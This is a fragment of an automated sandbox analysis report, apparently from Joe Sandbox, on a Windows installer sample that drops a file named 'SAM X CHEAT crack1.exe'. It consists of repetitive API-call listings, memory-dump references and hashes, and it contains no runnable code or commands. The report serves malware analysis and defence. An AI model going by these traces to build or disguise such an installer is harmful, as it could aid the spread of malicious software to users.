                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042BCC8,C0000000,00000004,0042BCC8,?,?,?,00000000,000000F1,?), ref: 004059BB
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059CA
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059E0
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8C8,00000000,-0000000A,00409404,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A26
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A38
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405A3F
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A46
                                                                                                                                                                                                                                                                                        • Part of subcall function 004057ED: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059FB,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004057ED: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059FB,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405824
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s=%s$[Rename]
                                                                                                                                                                                                                                                                                      • API String ID: 3445103937-1727408572
                                                                                                                                                                                                                                                                                      • Opcode ID: 98de3fece22c2c5f336e397123907592c69a454d308d27e656aae89801f4cebd
                                                                                                                                                                                                                                                                                      • Instruction ID: f45ed1bdfbf8c4b03de67142e423a5701368854c8b403738f0f2c648216b24c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98de3fece22c2c5f336e397123907592c69a454d308d27e656aae89801f4cebd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D741D471B05B157BD7206B619C89F6B3B5CDF85754F040136F905F62D2EA38E8018EAD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00429898,00000000,00404EC5,00429898,00000000), ref: 00405C6B
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,00000400), ref: 00405CE6
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,00000400), ref: 00405CF9
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,004193F1), ref: 00405D35
                                                                                                                                                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(004193F1, C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe), ref: 00405D43
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(004193F1), ref: 00405D4E
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D70
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,?,00429898,00000000,00404EC5,00429898,00000000), ref: 00405DC2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                      • API String ID: 900638850-1028234918
                                                                                                                                                                                                                                                                                      • Opcode ID: 60f0a343def428824789f7b7b315240d083d7a63688ee54c3b9f77de7071f477
                                                                                                                                                                                                                                                                                      • Instruction ID: fa1e0b9f47c9474f0aa02006464afd466a30f7754b548aa089decd5b8df859b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60f0a343def428824789f7b7b315240d083d7a63688ee54c3b9f77de7071f477
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8512531A04A15ABEB205B698C88BBB3B64DF11314F54827BE511BA2D0D37C5942DF4E
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\EsgeCzT4do.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E5B
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\EsgeCzT4do.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E6D
                                                                                                                                                                                                                                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E8,C:\Users\user\AppData\Local\Temp\,00000000,00403299), ref: 00405E7D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\EsgeCzT4do.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                                      • API String ID: 589700163-1458530657
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b5f3268fa1fae19e58d0ad2ced72642c676bfd811e2c7a6988a98807c9a22ca
                                                                                                                                                                                                                                                                                      • Instruction ID: 8c0debaa59703488c7458a94fa91a8896e4240cf3d31b331365b77cfd974a1c9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b5f3268fa1fae19e58d0ad2ced72642c676bfd811e2c7a6988a98807c9a22ca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11B671804A912DEB3217289C44B777FC8CB66790F18447BD4D5723C2D67C5D428AAD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403EE1
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403EFD
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403F09
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403F15
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403F28
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403F38
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403F52
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403F5C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                                                                                                                                                                                                                                      • Instruction ID: 0d89a351d513fb24bb3d4bb4099581c898fc75933690e96f4850fc1bb23eeaf2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91214271904745ABCB219F78DD08B4B7FF8AF05715B048629F995A22E0D734E9048B65
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040273B
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402754
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3294113728-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9c2b519bab710da34c4f93b0ba9d6d86cd7c01b4cb3bb32b5413ac78432567f7
                                                                                                                                                                                                                                                                                      • Instruction ID: 5b53ae4c2b613e87b8af51cb2b1d5881ebc53a54f05e9f53cd44442d287e2222
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c2b519bab710da34c4f93b0ba9d6d86cd7c01b4cb3bb32b5413ac78432567f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3131A971C00128BBCF216FA5CE88DAE7F79EF05364F10423AF920762E1C67949408FA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000,?), ref: 00404EC6
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00402FCC,00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000), ref: 00404ED6
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00429898,00402FCC,00402FCC,00429898,00000000,004193F1,759223A0), ref: 00404EE9
                                                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00429898,00429898), ref: 00404EFB
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F3B
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 608088ad9ffc8be51c5c0cf58f275dda30e696d1ba06748ac5dda82a5f93996a
                                                                                                                                                                                                                                                                                      • Instruction ID: d5e3cfdbeb95b60488c6f1e99959168c2d2eab17d02c72d4f5409838ea1ae410
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 608088ad9ffc8be51c5c0cf58f275dda30e696d1ba06748ac5dda82a5f93996a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C21CF71900119BBDF11AFA5CD849DEBFB9EF45354F04807AF608B6290C779AE408FA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404777
                                                                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040477F
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404799
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047AB
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                      • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                                                                                                                                                                                                                                      • Instruction ID: 1287270e3ce35f4bc81f554f3193770291cde8f8b01dc106229a8c11fbd36195
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99014071D00219BADB01DBA4DD85FFEBBFCAB59711F10412BBA10B72C0D7B465018BA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(0031BF34,00000064,0031BF38), ref: 00402B97
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402BA7
                                                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402BB7
                                                                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402BA1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                      • Opcode ID: f4b40b60170e557e8e64fd1007bdae5203f411c8eb827d09f08439ceb1717922
                                                                                                                                                                                                                                                                                      • Instruction ID: 170251b52dccb1bc1045efc101099eb7df8550efa5a7238432f4f3ca5a85e13a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4b40b60170e557e8e64fd1007bdae5203f411c8eb827d09f08439ceb1717922
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C501F470644209BBDB209F61DD49EED3779AB44305F008039FA06B52D0D7B599558F95
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405392
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004053A6
                                                                                                                                                                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053BB
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004053C5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                                                                      • API String ID: 3449924974-1246513382
                                                                                                                                                                                                                                                                                      • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                                                                                                                                                                                                                                      • Instruction ID: 0f194ad754f8d2153fe6bade7a67ae4222ab15fc701b17716cfd16251ec2b406
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5010871D04259EBEF119BA0D904BEFBFB8EF04354F00457AE905B6180D3B89614CFAA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                                                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
